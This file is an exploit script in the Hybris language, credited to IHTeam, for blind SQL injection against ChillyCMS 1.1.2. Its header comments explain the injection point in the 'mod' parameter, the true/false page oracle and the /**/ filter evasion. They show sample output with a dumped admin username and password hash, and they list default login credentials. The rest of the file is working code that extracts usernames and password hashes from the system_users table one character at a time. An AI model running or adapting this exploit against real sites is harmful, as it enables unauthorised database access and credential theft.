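#!/usr/bin/hybris
#################################################################################
#
# Exploit Title: ChillyCMS Blind Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link: http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9
# Version: 1.1.2
# Tested on: Win/Linux
#
# Injection point: the "mod" parameter of /chillyCMS/core/show.site.php?editprofile.
# The script asks boolean questions of the form
#     4 AND (SELECT SUBSTRING(<col>,<pos>,1) FROM system_users LIMIT 0,1)=char(<code>)
# and reads the answer from the response: when the condition is true the profile
# form is rendered (the page contains name='user'), when it is false it is not.
# /**/ is used instead of spaces so the payload survives space filtering and
# needs no URL encoding.  Only the first row of system_users (LIMIT 0,1) is read.
#
# Example:
# [user@user Advisories]$ hybris chillycms.hy
# Searching Username... :
# admin
# Searching password hash... :
# d033e22ae348aeb5660fc2140aec35850c4da997
#
# NOTE: the example hash is 40 hex characters, i.e. SHA-1 length; an MD5 digest
# is 32.  The script does not know the algorithm -- it just dumps the "pw" column
# character by character -- so check the CMS source before cracking the value.
#
# DEFAULT USERNAME AND PASSWORD:
# User: jens
# Pass: demo
#
# Thanks to evilsocket for Hybris
# http://www.hybris-lang.org/
#################################################################################
import std.*;

# ---- target -------------------------------------------------------------------
# The original hard-coded http://localhost; edit these two values for another
# installation.  Run only against systems you are authorised to test.
target = "http://localhost";
path   = "/chillyCMS/core/show.site.php?editprofile&mod=";

# ---- payload ------------------------------------------------------------------
# Final URL: <path>query1<col>,<pos>,1<query2><code>)
# "4" is an existing mod id, so the page renders normally when the appended
# condition holds and the oracle below fires.
query1 = "4/**/AND/**/(SELECT/**/SUBSTRING(";
query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char(";

# ---- alphabets ----------------------------------------------------------------
# Hash alphabet, probed in this fixed order (the original iterated the keys of a
# map, whose order is not guaranteed).  Lowercase hex only, matching the example
# output above.  chars maps a char() code back to the character it stands for.
hexcodes = [48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102];
chars = [48:'0',49:'1',50:'2',51:'3',52:'4',53:'5',54:'6',55:'7',56:'8',57:'9',
         97:'a',98:'b',99:'c',100:'d',101:'e',102:'f'];

# ---- 1. username --------------------------------------------------------------
# Only a-z is probed.  Digits, '_' and upper-case are not in the alphabet, so a
# username containing them is cut off at the first such position.  Upper-case is
# left out on purpose: with a case-insensitive collation 'a' and 'A' would both
# compare equal and the same position would be appended twice.
usr = "";
i = 1;
println("Searching Username... : ");
while(1) {
    found = false;
    chrs = 'a' .. 'z';
    foreach(char of chrs) {
        code = toint(char);
        url  = path + query1 + "user," + i + ",1" + query2 + code + ")";
        html = http_get( target, url );
        if (html ~= "/name='user'/") {
            usr += char;
            i += 1;
            found = true;
            # Exactly one character per position: stop probing this position and
            # restart the alphabet for the next one.  (The original kept going and
            # silently tested the rest of the alphabet against position i+1.)
            break;
        }
    }
    # No candidate matched: end of the value -- or a character outside the
    # alphabet, or a failed/blocked request.  Confirm with a manual probe
    # (e.g. LENGTH(user)=<n>) before trusting a short result.
    if (!found) {
        break;
    }
}
println(usr);

# ---- 2. password hash ---------------------------------------------------------
# Same oracle against the "pw" column.  Stops at the first position where none
# of the 16 hex digits matches (end of hash, or a non-hex character).
password = "";
i = 1;
println("Searching password hash... : ");
while(1) {
    found = false;
    foreach(code of hexcodes) {
        url  = path + query1 + "pw," + i + ",1" + query2 + code + ")";
        html = http_get( target, url );
        if (html ~= "/name='user'/") {
            password += chars[code];
            i += 1;
            found = true;
            break;
        }
    }
    if (!found) {
        break;
    }
}
println(password);
println();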